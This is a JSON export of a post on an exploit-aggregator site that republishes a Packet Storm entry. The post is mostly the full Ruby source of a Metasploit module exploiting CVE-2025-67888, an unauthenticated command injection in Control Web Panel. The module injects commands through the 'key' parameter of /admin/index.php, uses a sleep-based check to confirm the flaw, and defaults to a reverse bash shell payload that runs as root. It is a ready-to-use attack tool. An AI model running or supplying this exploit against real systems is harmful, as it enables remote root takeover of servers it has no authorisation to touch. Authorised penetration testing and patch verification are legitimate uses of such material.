{"id":35729,"date":"2026-01-14T13:44:45","date_gmt":"2026-01-14T13:44:45","guid":{"rendered":"http:\/\/localhost\/?p=35729"},"modified":"2026-01-14T13:44:45","modified_gmt":"2026-01-14T13:44:45","slug":"control-web-panel-0981208-remote-code-execution","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=35729","title":{"rendered":"\ud83d\udcc4 Control Web Panel 0.9.8.1208 Remote Code Execution_PACKETSTORM:213897"},"content":{"rendered":"

{“lastseen”:”2026-01-14T18:59:45″,”description”:”Control Web Panel CWP versions less than or equal to 0.9.8.1208 are vulnerable to unauthenticated OS command injection. User input passed via the \\”key\\” GET parameter to \/admin\/index.php when the \\”api\\” parameter is set is not properly sanitized before…”,”published”:”2026-01-14T00:00:00″,”modified”:”2026-01-14T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Control Web Panel 0.9.8.1208 Remote Code Execution”,”source”:””,”references”:””,”id”:”PACKETSTORM:213897″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-67888″],”sourceData”:”##\\n # This module requires Metasploit: https:\/\/metasploit.com\/download\\n # Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n ##\\n \\n class MetasploitModule \\u003c Msf::Exploit::Remote\\n Rank = ExcellentRanking\\n \\n prepend Msf::Exploit::Remote::AutoCheck\\n include Msf::Exploit::Remote::HttpClient\\n include Msf::Exploit::CmdStager\\n \\n def initialize(info = {})\\n super(\\n update_info(\\n info,\\n ‘Name’ =\\u003e ‘Control Web Panel \/admin\/index.php Unauthenticated RCE’,\\n ‘Description’ =\\u003e %q{\\n Control Web Panel (CWP) versions \\u003c= 0.9.8.1208 are vulnerable to\\n unauthenticated OS command injection. User input passed via the\\n \\”key\\” GET parameter to \/admin\/index.php (when the \\”api\\” parameter is set)\\n is not properly sanitized before being used to execute OS commands.\\n This can be exploited by unauthenticated attackers to inject and execute\\n arbitrary OS commands with the privileges of the root user on the web server.\\n \\n Successful exploitation usually requires \\”Softaculous\\” and\/or \\”SitePad\\”\\n to be installed through the Scripts Manager.\\n },\\n ‘Author’ =\\u003e [\\n ‘Lukas Johannes M\u00f6ller’, # Metasploit module\\n ‘Egidio Romano’ # Vulnerability discovery\\n ],\\n ‘References’ =\\u003e [\\n [‘CVE’, ‘2025-67888’],\\n [‘URL’, ‘https:\/\/karmainsecurity.com\/KIS-2025-09’],\\n [‘URL’, ‘https:\/\/www.cve.org\/CVERecord?id=CVE-2025-67888’],\\n [‘URL’, ‘https:\/\/control-webpanel.com’]\\n ],\\n ‘DisclosureDate’ =\\u003e ‘2025-12-16’,\\n ‘License’ =\\u003e MSF_LICENSE,\\n ‘Platform’ =\\u003e [‘linux’, ‘unix’],\\n ‘Arch’ =\\u003e ARCH_ALL,\\n ‘Privileged’ =\\u003e true,\\n ‘Targets’ =\\u003e [\\n [\\n ‘Unix Command’,\\n {\\n ‘Platform’ =\\u003e ‘unix’,\\n ‘Arch’ =\\u003e ARCH_ALL,\\n ‘DefaultOptions’ =\\u003e {\\n ‘PAYLOAD’ =\\u003e ‘cmd\/unix\/reverse_bash’\\n },\\n ‘Payload’ =\\u003e {\\n ‘Encoder’ =\\u003e ‘cmd\/base64’,\\n ‘BadChars’ =\\u003e \\”\\\\x00\\\\x20\\”\\n }\\n }\\n ],\\n [\\n ‘Linux Dropper’,\\n {\\n ‘Platform’ =\\u003e ‘linux’,\\n ‘Arch’ =\\u003e ARCH_ALL\\n }\\n ]\\n ],\\n ‘DefaultTarget’ =\\u003e 0,\\n ‘DefaultOptions’ =\\u003e {\\n ‘SSL’ =\\u003e true\\n },\\n ‘Notes’ =\\u003e {\\n ‘Stability’ =\\u003e [CRASH_SAFE],\\n ‘Reliability’ =\\u003e [REPEATABLE_SESSION],\\n ‘SideEffects’ =\\u003e [IOC_IN_LOGS]\\n }\\n )\\n )\\n \\n register_options([\\n Opt::RPORT(2031)\\n ])\\n end\\n \\n def check\\n sleep_time = rand(5..10)\\n \\n print_status(\\”Checking vulnerability with sleep command (waiting #{sleep_time} seconds)…\\”)\\n \\n res, elapsed_time = Rex::Stopwatch.elapsed_time do\\n send_request_cgi(\\n ‘method’ =\\u003e ‘GET’,\\n ‘uri’ =\\u003e normalize_uri(‘\/admin\/index.php’),\\n ‘vars_get’ =\\u003e {\\n ‘api’ =\\u003e ‘1’,\\n ‘key’ =\\u003e \\”$(sleep #{sleep_time})\\”\\n }\\n )\\n end\\n \\n vprint_status(\\”Elapsed time: #{elapsed_time.round(2)} seconds\\”)\\n \\n return CheckCode::Unknown(‘No response from server.’) unless res\\n return CheckCode::Vulnerable(\\”Server waited #{elapsed_time.round(2)} seconds (expected \\u003e= #{sleep_time}).\\”) if elapsed_time \\u003e= sleep_time\\n \\n CheckCode::Safe(\\”Server responded in #{elapsed_time.round(2)} seconds (expected \\u003e= #{sleep_time}).\\”)\\n end\\n \\n def exploit\\n print_status(\\”Executing #{target.name} for #{datastore[‘PAYLOAD’]}\\”)\\n \\n case target[‘Type’]\\n when :unix_cmd\\n execute_command(payload.encoded)\\n when :linux_dropper\\n execute_cmdstager\\n end\\n end\\n \\n def execute_command(cmd, _opts = {})\\n vprint_status(\\”Executing command: #{cmd}\\”)\\n \\n send_request_cgi(\\n ‘method’ =\\u003e ‘GET’,\\n ‘uri’ =\\u003e normalize_uri(‘\/admin\/index.php’),\\n ‘vars_get’ =\\u003e {\\n ‘api’ =\\u003e ‘1’,\\n ‘key’ =\\u003e \\”$(#{cmd})\\”\\n }\\n )\\n end\\n end”,”sourceHref”:”https:\/\/packetstorm.news\/download\/213897″,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/213897\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"

{“lastseen”:”2026-01-14T18:59:45″,”description”:”Control Web Panel CWP versions less than or equal to 0.9.8.1208 are vulnerable to unauthenticated OS command injection. User input passed via the \\”key\\” GET…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,13,33,53,7,11,5],"class_list":["post-35729","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-news","tag-none","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n\ud83d\udcc4 Control Web Panel 0.9.8.1208 Remote Code Execution_PACKETSTORM:213897 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=35729\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 Control Web Panel 0.9.8.1208 Remote Code Execution_PACKETSTORM:213897 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{“lastseen”:”2026-01-14T18:59:45″,”description”:”Control Web Panel CWP versions less than or equal to 0.9.8.1208 are vulnerable to unauthenticated OS command injection. User input passed via the ”key” GET...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=35729\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-01-14T13:44:45+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"4 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=35729#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=35729\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 Control Web Panel 0.9.8.1208 Remote Code Execution_PACKETSTORM:213897\",\"datePublished\":\"2026-01-14T13:44:45+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=35729\"},\"wordCount\":734,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"exploit\",\"news\",\"NONE\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=35729#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=35729\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=35729\",\"name\":\"\ud83d\udcc4 Control Web Panel 0.9.8.1208 Remote Code Execution_PACKETSTORM:213897 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-01-14T13:44:45+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=35729#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=35729\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=35729#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 Control Web Panel 0.9.8.1208 Remote Code Execution_PACKETSTORM:213897\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 Control Web Panel 0.9.8.1208 Remote Code Execution_PACKETSTORM:213897 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=35729","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 Control Web Panel 0.9.8.1208 Remote Code Execution_PACKETSTORM:213897 - zero redgem","og_description":"{“lastseen”:”2026-01-14T18:59:45″,”description”:”Control Web Panel CWP versions less than or equal to 0.9.8.1208 are vulnerable to unauthenticated OS command injection. User input passed via the ”key” GET...","og_url":"https:\/\/zero.redgem.net\/?p=35729","og_site_name":"zero redgem","article_published_time":"2026-01-14T13:44:45+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"4 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=35729#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=35729"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 Control Web Panel 0.9.8.1208 Remote Code Execution_PACKETSTORM:213897","datePublished":"2026-01-14T13:44:45+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=35729"},"wordCount":734,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","exploit","news","NONE","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=35729#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=35729","url":"https:\/\/zero.redgem.net\/?p=35729","name":"\ud83d\udcc4 Control Web Panel 0.9.8.1208 Remote Code Execution_PACKETSTORM:213897 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-01-14T13:44:45+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=35729#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=35729"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=35729#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 Control Web Panel 0.9.8.1208 Remote Code Execution_PACKETSTORM:213897"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/35729","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=35729"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/35729\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=35729"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=35729"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=35729"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}